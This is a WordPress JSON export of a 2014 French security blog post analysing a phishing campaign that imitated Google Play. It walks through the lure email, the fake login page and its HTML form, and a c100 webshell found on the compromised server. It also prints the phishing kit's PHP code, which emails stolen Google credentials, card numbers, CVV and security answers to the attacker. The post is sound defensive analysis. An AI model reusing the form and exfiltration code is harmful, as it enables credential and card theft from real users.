{"id":269,"date":"2014-01-22T23:47:32","date_gmt":"2014-01-22T21:47:32","guid":{"rendered":"http:\/\/calypt.com\/blog\/?p=269"},"modified":"2014-01-23T02:31:03","modified_gmt":"2014-01-23T00:31:03","slug":"dissection-dune-attaque-de-phishing-1","status":"publish","type":"post","link":"https:\/\/www.calypt.com\/blog\/index.php\/dissection-dune-attaque-de-phishing-1\/","title":{"rendered":"Dissection d&#8217;une attaque par Phishing #1"},"content":{"rendered":"<p><img decoding=\"async\" loading=\"lazy\" class=\"wp-image-284 alignleft\" alt=\"Phishing\" src=\"http:\/\/calypt.com\/blog\/wp-content\/uploads\/2014\/01\/Firefox-phishing-dialog-590x300.png\" width=\"261\" height=\"133\" srcset=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2014\/01\/Firefox-phishing-dialog-590x300.png 590w, https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2014\/01\/Firefox-phishing-dialog.png 667w\" sizes=\"(max-width: 261px) 100vw, 261px\" \/><\/p>\n<p>Le jeudi 16 janvier 2014, Calypt a \u00e9t\u00e9 avertie d&#8217;un email de phishing diffus\u00e9 le jour m\u00eame. Apr\u00e8s avoir avertis les diff\u00e9rents acteurs, nous vous proposons une rapide analyse de cette attaque.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h1>Le mail<\/h1>\n<p><strong>Champ &#8220;From&#8221;<\/strong> : \u00ab Google Android &lt;support.clients@playg.com&gt; \u00bb<\/p>\n<p><strong>Objet<\/strong> : \u00ab La date d&#8217;expiration de votre compte arrive \u00e0 terme \u00bb<\/p>\n<p><strong>Corps du message<\/strong> : une image h\u00e9berg\u00e9e sur un site pirat\u00e9 (marque francaise d&#8217;alimentaire) qui malgr\u00e9 notre avertissement et acquitement de leur part, n&#8217;as toujours pas retir\u00e9 l&#8217;image :<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\" wp-image-271 alignnone\" alt=\"Phishing Google Play\" src=\"http:\/\/calypt.com\/blog\/wp-content\/uploads\/2014\/01\/unnamed.png\" width=\"628\" height=\"352\" srcset=\"https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2014\/01\/unnamed.png 819w, https:\/\/www.calypt.com\/blog\/wp-content\/uploads\/2014\/01\/unnamed-534x300.png 534w\" sizes=\"(max-width: 628px) 100vw, 628px\" \/><\/p>\n<p>L&#8217;image contient un lien vers le m\u00eame site que celui ou elle est heberg\u00e9e. En suivant ce lien on est redirig\u00e9 vers un autre site, vraisemblablement pirat\u00e9 lui aussi et enregistr\u00e9 en Pologne. Comme pour l&#8217;image, cette redirection et encore active \u00e0 l&#8217;heure de ce post.<\/p>\n<p>&nbsp;<\/p>\n<h1>Le site de phishing<\/h1>\n<div>Une fois redirig\u00e9, l&#8217;URL du site est http:\/\/195.28.16.33\/Service-<wbr \/>confirmation\/GooglePlaystore.<wbr \/>aspx\/gAuth.html (maintenant report\u00e9 comme phishing et apparemment nettoy\u00e9). On y d\u00e9couvre une page imitant parfaitement la page de login Google et on est invit\u00e9 \u00e0 rentrer notre <strong>login google<\/strong> et notre <strong>mot de passe<\/strong>. L&#8217;analyse confirmera que cette page est statique (html) et qu&#8217;aucun malware n&#8217;est associ\u00e9.<\/div>\n<div>\n<p>[pastacode provider=&#8221;manual&#8221; lang=&#8221;markup&#8221;]<\/p>\n<pre><code>&lt;form action=\"gConfirm.php\" method=\"post\"&gt;\r\n                    &lt;input type=\"text\" name=\"login\" placeholder=\"Email\" \/&gt;\r\n                    &lt;input type=\"password\" name=\"pwd\" placeholder=\"Password\" \/&gt;\r\n                    &lt;input type=\"submit\" name=\"submit\" value=\"Sign in\" \/&gt;\r\n                    &lt;input type=\"checkbox\" value=\"0\" id=\"staySigned\" name=\"staySigned\" checked=\"checked\" \/&gt;\r\n                &lt;\/form&gt;<\/code><\/pre>\n<p>[\/pastacode]<\/p>\n<\/div>\n<div>Comme on l&#8217;observe dans le code, une fois les informations entr\u00e9es, on est redirig\u00e9 vers la page <strong>gConfirm.php<\/strong>. Cette fois ci, nous sommes sur une page imitant une page de Google play sur laquelle il nous est demand\u00e9 de rentrer notre num\u00e9ro de <strong>carte bancaire<\/strong>, ainsi que la r\u00e9ponse \u00e0 une question secr\u00e8te. Le motif employ\u00e9 est le m\u00eame que dans le mail : v\u00e9rifier ses informations pour \u00e9viter de perdre son compte Google play.<\/div>\n<div><\/div>\n<div><\/div>\n<h1>L&#8217;analyse<\/h1>\n<div>Le serveur utilis\u00e9 pour le phishing (195.28.16.33) semble h\u00e9berger un site vitrine de soci\u00e9t\u00e9 et il y a de grandes chances pour qu&#8217;il ait \u00e9t\u00e9 compromis pour ce qui est de sa partie ill\u00e9gale. En utilisant <a href=\"https:\/\/www.owasp.org\/index.php\/Category:OWASP_DirBuster_Project\">dirbuster<\/a>, on trouve le r\u00e9pertoire 12\/ contenant le webshell c100. Les pirates semblent donc avoir laiss\u00e9 une backdoor accessibles \u00e0 tous &#8230;<\/div>\n<div>\n<div id=\"attachment_272\" style=\"width: 510px\" class=\"wp-caption alignnone\"><img aria-describedby=\"caption-attachment-272\" decoding=\"async\" loading=\"lazy\" class=\"size-full wp-image-272\" alt=\"c100\" src=\"http:\/\/calypt.com\/blog\/wp-content\/uploads\/2014\/01\/c100.png\" width=\"500\" height=\"261\" \/><p id=\"caption-attachment-272\" class=\"wp-caption-text\">c100<\/p><\/div>\n<\/div>\n<p>On a donc r\u00e9cuper\u00e9 les fichiers sources de l&#8217;attaque dans lesquels on remarque, sans surprise, les \u00e9l\u00e9ments r\u00e9cup\u00e9r\u00e9s puis envoy\u00e9 par email :<\/p>\n<p>[pastacode provider=&#8221;manual&#8221; lang=&#8221;php&#8221;]<\/p>\n<pre><code>$mail-&gt;message        .=    \"======BOSS HERE IS THE LOG: DATE &amp; TIME: $date AND IP: $ip=================&lt;br \/&gt;\";\r\n$mail-&gt;message        .=    'Google ID : '.$_POST['log'].'&lt;br \/&gt;';\r\n$mail-&gt;message        .=    'Password : '.$_POST['pwd'].'&lt;br \/&gt;';\r\n$mail-&gt;message        .=    '===================================================&lt;br \/&gt;';\r\n$mail-&gt;message        .=    'CC : '.$_POST['data1'].'&lt;br \/&gt;';\r\n$mail-&gt;message        .=    'CVV : '.$_POST['data2'].'&lt;br \/&gt;';\r\n$mail-&gt;message        .=    'Expiration Month : '.$_POST['data3'].'&lt;br \/&gt;';\r\n$mail-&gt;message        .=    'Expiration Year : '.$_POST['data4'].'&lt;br \/&gt;';\r\n$mail-&gt;message        .=    '===================================================&lt;br \/&gt;';\r\n$mail-&gt;message        .=    'Security Question : '.$_POST['data5'].'&lt;br \/&gt;';\r\n$mail-&gt;message        .=    'Security Response : '.$_POST['data6'].'&lt;br \/&gt;';\r\n$mail-&gt;message        .=    'Full Address : '.$_POST['data11'].'&lt;br \/&gt;';\r\n$mail-&gt;message        .=    'Birdthay Day : '.$_POST['data7'].'&lt;br \/&gt;';\r\n$mail-&gt;message        .=    'Birdthay Month : '.$_POST['data8'].'&lt;br \/&gt;';\r\n$mail-&gt;message        .=    'Birdthay Year : '.$_POST['data9'].'&lt;br \/&gt;';\r\n$mail-&gt;message        .=    'Full Name : '.$_POST['data10'].'&lt;br \/&gt;';\r\n$mail-&gt;message        .=    'ip:'.getenv(\"REMOTE_ADDR\").'&lt;br \/&gt;';\r\n$mail-&gt;send();<\/code><\/pre>\n<p>[\/pastacode]<\/p>\n<p>Bonus : l&#8217;email de l&#8217;attaquant (trouv\u00e9 dans les sources) : <a href=\"mailto:send.chanceux@gmail.com\" target=\"_blank\">send.chanceux@gmail.com<\/a><\/p>\n<p>&nbsp;<\/p>\n<h1>Conclusions<\/h1>\n<p>On a donc un phishing double, qui cherche \u00e0 r\u00e9cuperer des identifiants Google et la r\u00e9ponse \u00e0 la question secr\u00e8te ainsi que des donn\u00e9es de cartes bancaires. L&#8217;attaque reste basique, mais on notera quand m\u00eame un fran\u00e7ais de qualit\u00e9 ainsi qu&#8217;un design soign\u00e9, copiant de mani\u00e8re fid\u00e8le les originaux.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Le jeudi 16 janvier 2014, Calypt a \u00e9t\u00e9 avertie d&#8217;un email de phishing diffus\u00e9 le jour m\u00eame. Apr\u00e8s avoir avertis les diff\u00e9rents acteurs, nous vous proposons une rapide analyse de cette attaque. &nbsp; &nbsp; Le mail Champ &#8220;From&#8221; : \u00ab Google Android &lt;support.clients@playg.com&gt; \u00bb Objet : \u00ab La date d&#8217;expiration de votre compte arrive \u00e0 [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false},"categories":[1],"tags":[51],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v16.1.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<link rel=\"canonical\" href=\"https:\/\/www.calypt.com\/blog\/index.php\/dissection-dune-attaque-de-phishing-1\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Dissection d&#039;une attaque par Phishing #1 - Calypt\" \/>\n<meta property=\"og:description\" content=\"Le jeudi 16 janvier 2014, Calypt a \u00e9t\u00e9 avertie d&#8217;un email de phishing diffus\u00e9 le jour m\u00eame. Apr\u00e8s avoir avertis les diff\u00e9rents acteurs, nous vous proposons une rapide analyse de cette attaque. &nbsp; &nbsp; Le mail Champ &#8220;From&#8221; : \u00ab Google Android &lt;support.clients@playg.com&gt; \u00bb Objet : \u00ab La date d&#8217;expiration de votre compte arrive \u00e0 [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.calypt.com\/blog\/index.php\/dissection-dune-attaque-de-phishing-1\/\" \/>\n<meta property=\"og:site_name\" content=\"Calypt\" \/>\n<meta property=\"article:published_time\" content=\"2014-01-22T21:47:32+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2014-01-23T00:31:03+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/calypt.com\/blog\/wp-content\/uploads\/2014\/01\/Firefox-phishing-dialog-590x300.png\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\">\n\t<meta name=\"twitter:data1\" content=\"4 minutes\">\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.calypt.com\/blog\/#website\",\"url\":\"https:\/\/www.calypt.com\/blog\/\",\"name\":\"Calypt\",\"description\":\"Security thoughts\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":\"https:\/\/www.calypt.com\/blog\/?s={search_term_string}\",\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/dissection-dune-attaque-de-phishing-1\/#primaryimage\",\"inLanguage\":\"en-US\",\"url\":\"http:\/\/calypt.com\/blog\/wp-content\/uploads\/2014\/01\/Firefox-phishing-dialog-590x300.png\",\"contentUrl\":\"http:\/\/calypt.com\/blog\/wp-content\/uploads\/2014\/01\/Firefox-phishing-dialog-590x300.png\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/dissection-dune-attaque-de-phishing-1\/#webpage\",\"url\":\"https:\/\/www.calypt.com\/blog\/index.php\/dissection-dune-attaque-de-phishing-1\/\",\"name\":\"Dissection d'une attaque par Phishing #1 - Calypt\",\"isPartOf\":{\"@id\":\"https:\/\/www.calypt.com\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/dissection-dune-attaque-de-phishing-1\/#primaryimage\"},\"datePublished\":\"2014-01-22T21:47:32+00:00\",\"dateModified\":\"2014-01-23T00:31:03+00:00\",\"author\":{\"@id\":\"https:\/\/www.calypt.com\/blog\/#\/schema\/person\/b39592c4058c8985f373832ef96a7cf6\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/dissection-dune-attaque-de-phishing-1\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.calypt.com\/blog\/index.php\/dissection-dune-attaque-de-phishing-1\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/dissection-dune-attaque-de-phishing-1\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"item\":{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.calypt.com\/blog\/\",\"url\":\"https:\/\/www.calypt.com\/blog\/\",\"name\":\"Home\"}},{\"@type\":\"ListItem\",\"position\":2,\"item\":{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.calypt.com\/blog\/index.php\/dissection-dune-attaque-de-phishing-1\/\",\"url\":\"https:\/\/www.calypt.com\/blog\/index.php\/dissection-dune-attaque-de-phishing-1\/\",\"name\":\"Dissection d&#8217;une attaque par Phishing #1\"}}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.calypt.com\/blog\/#\/schema\/person\/b39592c4058c8985f373832ef96a7cf6\",\"name\":\"Lo\\u00efc\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/www.calypt.com\/blog\/#personlogo\",\"inLanguage\":\"en-US\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/3c9955a661ca1f761736f9a7f32772c3?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/3c9955a661ca1f761736f9a7f32772c3?s=96&d=mm&r=g\",\"caption\":\"Lo\\u00efc\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","_links":{"self":[{"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/posts\/269"}],"collection":[{"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=269"}],"version-history":[{"count":13,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/posts\/269\/revisions"}],"predecessor-version":[{"id":286,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/posts\/269\/revisions\/286"}],"wp:attachment":[{"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=269"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=269"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.calypt.com\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=269"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}